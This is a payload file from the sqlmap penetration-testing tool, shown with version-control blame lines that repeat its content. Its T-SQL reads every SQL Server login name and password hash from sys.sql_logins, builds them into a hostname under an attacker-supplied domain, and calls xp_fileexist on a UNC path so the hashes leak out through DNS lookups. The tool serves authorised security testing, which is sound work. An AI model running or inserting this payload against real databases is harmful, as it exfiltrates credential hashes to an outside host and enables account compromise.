sqlmap/procs/mssqlserver/dns_request.txt

# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf

DECLARE @host varchar(1024);
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
minor update and refactoring 2012-02-15 18:05:50 +04:00			`# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf`
minor update 2012-02-15 17:45:10 +04:00
			`DECLARE @host varchar(1024);`
			`SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;`
			`EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');`